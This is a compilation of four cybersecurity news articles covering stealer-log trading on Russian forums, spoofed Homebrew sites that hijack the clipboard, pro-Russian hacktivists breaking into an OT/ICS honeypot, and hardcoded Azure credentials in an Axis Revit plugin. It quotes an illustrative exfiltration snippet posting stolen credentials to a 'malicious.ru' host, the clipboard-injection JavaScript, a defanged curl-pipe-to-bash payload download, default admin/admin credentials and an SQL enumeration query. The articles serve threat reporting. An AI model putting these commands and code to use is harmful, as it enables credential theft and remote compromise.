A new evolution is underway in the Russian cybercrime ecosystem: market operators and threat actors are rapidly shifting from selling compromised Remote Desktop Protocol (RDP) access to trading malware stealer logs for unauthorized system entry.

This transition marks a significant change in both tactics and impact within the underground forums, affecting organizations and individuals worldwide.

Historically, RDP access sales dominated Russian cybercrime marketplaces, granting threat actors direct entry into corporate and government networks. However, the emergence of advanced stealer malware—such as RedLine, Raccoon, and Vidar—has transformed illicit trading.

Instead of selling static credentials, criminals now collect and broker “logs”: raw output from malware infections containing browser-saved passwords, cookies, autofill data, crypto wallet details, and session tokens.

These leaked logs allow opportunistic access to targeted environments, sometimes with greater reach and stealth than traditional RDP sales.

Rapid7 researchers observed this shift, highlighting how stealer-log packs frequently appear on prominent Russian forums—often bundled with automated scripts to facilitate credential extraction and exploitation.

This paradigm empowers attackers to bypass network-level controls and immediately impersonate victims in varied platforms, ramping up the risk for quick account takeover and data theft.

The scale and automation found within stealer log trading deeply challenges conventional security measures: as soon as the logs are posted, a wide array of criminals races to monetize or further weaponize the data.

Infection Mechanism

Modern stealer malware operates with remarkable efficiency. Once deployed—typically via phishing campaigns, poisoned software downloads, or malicious ads—the executable promptly scans for stored credentials, cookies, and wallets across browsers and desktop applications.

During its runtime, the stealer utilizes process injection and API calls (notably, accessing browser SQLite databases and reading credential stores).

A typical exfiltration code block includes:-

import requests
log_data = collect_credentials()
requests.post('http://malicious.ru/upload', data=log_data)

Persistence tactics are minimal—attackers focus on short-lived infection and swift extraction, sometimes removing the malware after log harvesting to evade detection.

By the time the compromised user’s security tools identify the stealer, credentials have often already been posted to forums, making account recovery difficult.

Cyber defenders must pivot toward real-time log monitoring, multi-factor authentication, and rapid incident response to counteract this versatile and scalable model embraced by Russian cybercriminals.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Russian Cybercrime Market Hub Transferring from RDP Access to Malware Stealer Logs to Access appeared first on Cyber Security News.

A sophisticated campaign targeting macOS users has emerged through spoofed Homebrew installer websites that deliver malicious payloads alongside legitimate package manager installations.

The attack exploits the widespread trust users place in the popular Homebrew package manager by creating pixel-perfect replicas of the official brew[.]sh installation page, complete with deceptive clipboard manipulation techniques.

Security researchers have identified multiple fraudulent domains mimicking the legitimate Homebrew website, including homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.

These malicious sites present convincing replicas of the official installation interface but incorporate hidden JavaScript designed to inject additional commands into users’ clipboards without their knowledge.

Unlike authentic Homebrew pages that allow manual text selection, these spoofed versions force users to utilize a designated Copy button, enabling attackers to insert malicious payloads alongside standard installation commands.

The campaign represents a significant evolution in supply chain attacks, targeting not the package repositories themselves but the initial installation process.

While Homebrew has maintained a strong security track record with no recent compromises, threat actors have discovered an effective workaround by impersonating the trusted installation source.

The Sequence analysts identified this emerging threat pattern through systematic monitoring of suspicious domains and infrastructure associated with known malware distribution networks.

The attack methodology demonstrates remarkable sophistication in its execution and evasion capabilities.

Rather than compromising legitimate package repositories, attackers have developed a parallel infrastructure that intercepts users during the critical installation phase.

This approach bypasses traditional security measures focused on repository monitoring while exploiting the inherent trust users place in familiar installation procedures.

Advanced Clipboard Manipulation Techniques

The core infection mechanism relies on JavaScript-based clipboard manipulation that operates transparently to the victim.

When users click the Copy button on spoofed sites, embedded code executes a series of operations designed to inject malicious commands alongside the expected Homebrew installation script.

The JavaScript implementation includes Russian-language comments explicitly indicating where malicious commands should be inserted, suggesting a commodity-style threat service.

The malicious script prevents standard text selection through event listeners that disable contextmenu, selectstart, copy, cut, and dragstart operations on the installation block.

This forces victims to use the provided Copy button, which triggers the copyInstallCommand() function. The function writes a predetermined command to the clipboard using either the modern Clipboard API or fallback textarea methods for compatibility across different browser environments.

const copyCommand = 'echo '; // ← замени на нужную
async function copyInstallCommand () {
    await navigator[.]clipboard[.]writeText (copyCommand);
    fetch ('notify[.]php', {
        method: 'POST',
        headers: { 'Content-Type': 'application / json' },
        body: JSON[.]stringify ({ event: 'copy_install_command', time: new Date () })
    });
}

Analysis revealed that active campaigns utilize commands such as curl - s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & which downloads and executes additional payloads in the background while the legitimate Homebrew installation proceeds normally, creating an effective dual-execution scenario that maintains operational stealth while establishing persistent access to compromised systems.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads appeared first on Cyber Security News.

A newly identified pro-Russian hacktivist group has successfully infiltrated operational technology and industrial control systems belonging to critical infrastructure organizations, employing sophisticated techniques to steal login credentials and disrupt vital services.

The threat actor, known as TwoNet, represents an emerging class of hacktivists who have expanded beyond traditional distributed denial-of-service attacks to target human-machine interfaces and programmable logic controllers in water treatment facilities, solar installations, and other industrial environments.

The group’s attack methodology demonstrates a concerning evolution in hacktivist capabilities, moving from simple website defacements to complex manipulation of industrial processes.

TwoNet’s operations have been observed across multiple European countries, with particular focus on utilities and energy infrastructure in nations they consider adversarial.

Their activities include database enumeration, system defacement, process disruption, and credential harvesting from internet-exposed OT/ICS devices.

Forescout analysts identified the malware and attack patterns through sophisticated honeypot operations designed to attract and monitor threat actors targeting critical infrastructure.

The research team’s water treatment facility honeypot successfully captured TwoNet’s intrusion methodology, providing unprecedented visibility into the group’s tactics, techniques, and procedures.

This intelligence gathering effort revealed not only the specific attack vectors employed but also the broader ecosystem of affiliated hacktivist groups operating in coordination.

The attackers demonstrated particular expertise in exploiting default authentication mechanisms, utilizing SQL injection techniques, and leveraging known vulnerabilities in human-machine interface systems.

Their operations span multiple industrial protocols including Modbus and S7 communications, indicating sophisticated knowledge of operational technology environments.

The group’s ability to maintain persistence across multiple login sessions and systematically alter critical system configurations represents a significant escalation in hacktivist threat capabilities.

Advanced Database Exploitation and System Manipulation Techniques

The intrusion methodology employed by TwoNet reveals sophisticated database enumeration capabilities that extend far beyond typical hacktivist operations.

The attackers initiated their assault by logging into the human-machine interface using default credentials (admin/admin), immediately proceeding to execute complex SQL queries designed to extract comprehensive schema information from the target system.

The group’s initial database reconnaissance involved executing sophisticated queries through the sql.shtm page, beginning with failed attempts using primary key enumeration commands.

When these initial queries failed, the attackers demonstrated remarkable persistence by modifying their approach and successfully extracting detailed table structures using alternative SQL syntax:-

SELECT t.TABLENAME, c.COLUMNNAME, c.COLUMNNUMBER, c.COLUMNDATATYPE,
c.COLUMNDEFAULT, c.AUTOINCREMENTVALUE, c.AUTOINCREMENTSTART,
c.AUTOINCREMENTINC
FROM sys.systables t
JOIN sys.syscolumns c ON t.TABLEID = c.REFERENCEID
WHERE t.tabletype = 'T'
ORDER BY t.TABLENAME, c.COLUMNNUMBER

Following successful database enumeration, the attackers created a new user account named “BARLATI” and maintained access across multiple sessions spanning nearly 24 hours.

Their systematic approach included exploiting CVE-2021-26829 to inject malicious JavaScript code into the HMI login page, creating persistent defacement that would trigger alerts whenever administrators accessed the system.

The attackers also demonstrated advanced operational security by modifying system settings to disable logging and alarm mechanisms, effectively blinding security monitoring systems to their ongoing activities.

The sophistication of these database manipulation techniques, combined with the group’s ability to maintain operational security while conducting multi-stage attacks, indicates access to advanced tooling and significant operational experience that extends beyond typical hacktivist capabilities.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Pro-Russian Hacktivist Attacking OT/ICS Devices to Steal Login Credentials appeared first on Cyber Security News.

A critical vulnerability in Axis Communications’ Autodesk Revit plugin has exposed Azure Storage Account credentials, creating significant security risks for customers and potentially enabling supply chain attacks targeting the architecture and engineering industry.

The vulnerability stems from hardcoded credentials embedded within signed Dynamic Link Libraries (DLLs) distributed to customers through the plugin’s Microsoft Installer (MSI) package.

The security flaw was discovered in July 2024 when Trend Micro’s VirusTotal rules detected Azure Shared Access Signature (SAS) tokens within a digitally signed DLL named “AzureBlobRestAPI.dll”.

The affected component was issued to AEC Advanced Engineering Computation Aktiebolag, an Autodesk partner specializing in AutoCAD and Revit platform consulting.

This discovery initiated a months-long remediation process involving multiple vulnerability reports and patches.

The exposed credentials provided unauthorized read and write access to three Azure storage accounts belonging to Axis Communications, a Swedish multinational company specializing in network video solutions and surveillance technology.

These accounts contained critical assets including MSI installers for the Axis Plugin for Autodesk Revit and Revit Family Architecture (RFA) files used by customers for building information modeling projects.

The vulnerability’s impact was amplified by the potential for attackers to replace legitimate files with malicious versions, effectively weaponizing the trusted distribution mechanism.

Trend Micro analysts identified additional security concerns beyond the credential exposure. Through their Zero Day Initiative (ZDI) research, they discovered multiple remote code execution vulnerabilities in Autodesk Revit that could be triggered by importing malicious RFA files.

This combination of vulnerabilities created a dangerous attack vector where threat actors could potentially compromise the storage accounts, upload crafted RFA files, and achieve mass compromise of Axis Communications customers using Autodesk Revit software.

The discovery highlights broader supply chain security risks within the architectural and engineering software ecosystem.

The plugin’s design flaws demonstrate how trusted third-party integrations can become attack vectors when proper security controls are not implemented.

Technical Analysis of the Vulnerability

The vulnerability’s technical foundation lies in poor credential management practices within the plugin’s architecture.

Researchers found cleartext Azure SAS tokens and shared access key pairs for two Azure storage accounts named “axisfiles” and “axiscontentfiles” embedded within a private method called “internalSetEnvironment” of the class “AzureBlobRestAPI.DataTypes.Classes.Global”.

The credentials granted extensive privileges including full read, write, delete, list, add, create, update, process, and execute permissions across the storage accounts.

This level of access far exceeded the principle of least privilege, enabling attackers to not only access existing content but also modify distribution mechanisms and upload malicious files.

When Axis Communications initially attempted to remediate the issue with version 25.3.710, they implemented code obfuscation using tools like Eazfuscator.

However, this approach proved inadequate as the obfuscated credentials could be easily de-obfuscated using publicly available tools such as de4dot.

The obfuscation merely provided security through obscurity rather than addressing the fundamental design flaw of embedding credentials in client-side code.

The vulnerability’s persistence was further complicated by the storage accounts containing historical versions of the plugin installers.

Even after implementing read-only SAS tokens in version 25.3.711, researchers discovered that attackers could still access previous plugin versions containing the overly permissive credentials, effectively bypassing the remediation efforts until all historical versions were properly secured.

Axis Communications has confirmed that the vulnerabilities have been fully patched in the current version 25.3.718, with all previously reported issues resolved.

The company has also taken proactive steps to notify affected partners and customers, emphasizing that the Autodesk Revit plugin is provided only to select partners and is generally not accessible for public use.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Axis Communications Vulnerability Exposes Azure Storage Account Credentials appeared first on Cyber Security News.